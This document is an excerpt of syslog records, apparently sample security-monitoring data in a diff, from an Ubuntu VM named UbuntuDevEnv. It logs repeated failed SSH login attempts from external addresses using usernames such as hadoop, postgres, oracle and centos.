+6263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:27,UbuntuDevEnv,2019-06-26 16:49:26,auth,UbuntuDevEnv,info,Invalid user hadoop from 35.154.19.93 port 53846,41052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,35.154.19.9,53846,,
+6264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:27,UbuntuDevEnv,2019-06-26 16:49:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:27,UbuntuDevEnv,2019-06-26 16:49:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:28,UbuntuDevEnv,2019-06-26 16:49:28,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 35.154.19.93 port 53846 ssh2,41052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,35.154.19.9,53846,,
+6267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:29,UbuntuDevEnv,2019-06-26 16:49:28,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 53846:11: Normal Shutdown, Thank you for playing [preauth]",41052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,53846,,
+6268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:29,UbuntuDevEnv,2019-06-26 16:49:28,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 35.154.19.93 port 53846 [preauth],41052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,35.154.19.9,53846,,
+6269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:00,UbuntuDevEnv,2019-06-26 16:50:00,auth,UbuntuDevEnv,info,Invalid user hadoop from 35.154.19.93 port 57156,41166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,35.154.19.9,57156,,
+6270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:00,UbuntuDevEnv,2019-06-26 16:50:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:00,UbuntuDevEnv,2019-06-26 16:50:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:02,UbuntuDevEnv,2019-06-26 16:50:01,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 35.154.19.93 port 57156 ssh2,41166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,35.154.19.9,57156,,
+6273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:02,UbuntuDevEnv,2019-06-26 16:50:02,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 57156:11: Normal Shutdown, Thank you for playing [preauth]",41166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,57156,,
+6274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:02,UbuntuDevEnv,2019-06-26 16:50:02,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 35.154.19.93 port 57156 [preauth],41166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,35.154.19.9,57156,,
+6275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:14,UbuntuDevEnv,2019-06-26 16:50:14,auth,UbuntuDevEnv,info,Invalid user postgres from 35.154.19.93 port 60426,41222,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,35.154.19.9,60426,,
+6276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:14,UbuntuDevEnv,2019-06-26 16:50:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41222,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:14,UbuntuDevEnv,2019-06-26 16:50:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41222,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:16,UbuntuDevEnv,2019-06-26 16:50:15,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 35.154.19.93 port 60426 ssh2,41222,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,35.154.19.9,60426,,
+6279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:16,UbuntuDevEnv,2019-06-26 16:50:15,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 60426:11: Normal Shutdown, Thank you for playing [preauth]",41222,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,60426,,
+6280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:16,UbuntuDevEnv,2019-06-26 16:50:15,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 35.154.19.93 port 60426 [preauth],41222,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,35.154.19.9,60426,,
+6281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:22,UbuntuDevEnv,2019-06-26 16:50:21,auth,UbuntuDevEnv,info,Invalid user postgres from 35.154.19.93 port 35482,41250,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,35.154.19.9,35482,,
+6282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:22,UbuntuDevEnv,2019-06-26 16:50:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41250,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:22,UbuntuDevEnv,2019-06-26 16:50:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41250,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:23,UbuntuDevEnv,2019-06-26 16:50:23,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 35.154.19.93 port 35482 ssh2,41250,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,35.154.19.9,35482,,
+6285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:24,UbuntuDevEnv,2019-06-26 16:50:23,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 35482:11: Normal Shutdown, Thank you for playing [preauth]",41250,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,35482,,
+6286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:24,UbuntuDevEnv,2019-06-26 16:50:23,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 35.154.19.93 port 35482 [preauth],41250,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,35.154.19.9,35482,,
+6287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:25,UbuntuDevEnv,2019-06-26 16:50:24,auth,UbuntuDevEnv,info,Invalid user html from 171.8.199.77 port 58770,41241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,html,171.8.199.7,58770,,
+6288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:25,UbuntuDevEnv,2019-06-26 16:50:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,41241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:25,UbuntuDevEnv,2019-06-26 16:50:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:26,UbuntuDevEnv,2019-06-26 16:50:26,auth,UbuntuDevEnv,info,Failed password for invalid user html from 171.8.199.77 port 58770 ssh2,41241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,html,171.8.199.7,58770,,
+6291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:26,UbuntuDevEnv,2019-06-26 16:50:26,auth,UbuntuDevEnv,info,Disconnected from invalid user html 171.8.199.77 port 58770 [preauth],41241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,html,171.8.199.7,58770,,
+6292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:26,UbuntuDevEnv,2019-06-26 16:50:26,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 58770:11: Bye Bye [preauth],41241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,58770,,
+6293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:29,UbuntuDevEnv,2019-06-26 16:50:28,auth,UbuntuDevEnv,info,Invalid user red from 81.0.212.18 port 59041,41285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,red,81.0.212.1,59041,,
+6294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:29,UbuntuDevEnv,2019-06-26 16:50:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,41285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:29,UbuntuDevEnv,2019-06-26 16:50:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:29,UbuntuDevEnv,2019-06-26 16:50:29,auth,UbuntuDevEnv,info,Invalid user oracle from 35.154.19.93 port 38756,41284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,35.154.19.9,38756,,
+6297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:29,UbuntuDevEnv,2019-06-26 16:50:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:29,UbuntuDevEnv,2019-06-26 16:50:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:30,UbuntuDevEnv,2019-06-26 16:50:30,auth,UbuntuDevEnv,info,Failed password for invalid user red from 81.0.212.18 port 59041 ssh2,41285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,red,81.0.212.1,59041,,
+6300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:31,UbuntuDevEnv,2019-06-26 16:50:30,auth,UbuntuDevEnv,info,Disconnected from invalid user red 81.0.212.18 port 59041 [preauth],41285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,red,81.0.212.1,59041,,
+6301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:31,UbuntuDevEnv,2019-06-26 16:50:30,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 59041:11: Bye Bye [preauth],41285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,59041,,
+6302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:32,UbuntuDevEnv,2019-06-26 16:50:32,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 38756:11: Normal Shutdown, Thank you for playing [preauth]",41284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,38756,,
+6303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:32,UbuntuDevEnv,2019-06-26 16:50:32,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 35.154.19.93 port 38756 ssh2,41284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,35.154.19.9,38756,,
+6304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:32,UbuntuDevEnv,2019-06-26 16:50:32,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 35.154.19.93 port 38756 [preauth],41284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,35.154.19.9,38756,,
+6305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:36,UbuntuDevEnv,2019-06-26 16:50:36,auth,UbuntuDevEnv,info,Invalid user oracle from 35.154.19.93 port 42030,41309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,35.154.19.9,42030,,
+6306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:36,UbuntuDevEnv,2019-06-26 16:50:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:36,UbuntuDevEnv,2019-06-26 16:50:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:38,UbuntuDevEnv,2019-06-26 16:50:37,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 35.154.19.93 port 42030 ssh2,41309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,35.154.19.9,42030,,
+6309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:38,UbuntuDevEnv,2019-06-26 16:50:37,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 42030:11: Normal Shutdown, Thank you for playing [preauth]",41309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,42030,,
+6310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:38,UbuntuDevEnv,2019-06-26 16:50:37,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 35.154.19.93 port 42030 [preauth],41309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,35.154.19.9,42030,,
+6311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:43,UbuntuDevEnv,2019-06-26 16:50:43,auth,UbuntuDevEnv,info,Invalid user centos from 35.154.19.93 port 45276,41334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,35.154.19.9,45276,,
+6312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:43,UbuntuDevEnv,2019-06-26 16:50:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:43,UbuntuDevEnv,2019-06-26 16:50:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:45,UbuntuDevEnv,2019-06-26 16:50:45,auth,UbuntuDevEnv,info,Failed password for invalid user centos from 35.154.19.93 port 45276 ssh2,41334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,35.154.19.9,45276,,
+6315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:45,UbuntuDevEnv,2019-06-26 16:50:45,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 45276:11: Normal Shutdown, Thank you for playing [preauth]",41334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,45276,,
+6316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:50:45,UbuntuDevEnv,2019-06-26 16:50:45,auth,UbuntuDevEnv,info,Disconnected from invalid user centos 35.154.19.93 port 45276 [preauth],41334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,35.154.19.9,45276,,
+6317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:04,UbuntuDevEnv,2019-06-26 16:51:03,auth,UbuntuDevEnv,info,Invalid user centos from 35.154.19.93 port 48568,41408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,35.154.19.9,48568,,
+6318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:04,UbuntuDevEnv,2019-06-26 16:51:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:04,UbuntuDevEnv,2019-06-26 16:51:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:06,UbuntuDevEnv,2019-06-26 16:51:05,auth,UbuntuDevEnv,info,Failed password for invalid user centos from 35.154.19.93 port 48568 ssh2,41408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,35.154.19.9,48568,,
+6321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:06,UbuntuDevEnv,2019-06-26 16:51:05,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 48568:11: Normal Shutdown, Thank you for playing [preauth]",41408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,48568,,
+6322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:06,UbuntuDevEnv,2019-06-26 16:51:05,auth,UbuntuDevEnv,info,Disconnected from invalid user centos 35.154.19.93 port 48568 [preauth],41408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,35.154.19.9,48568,,
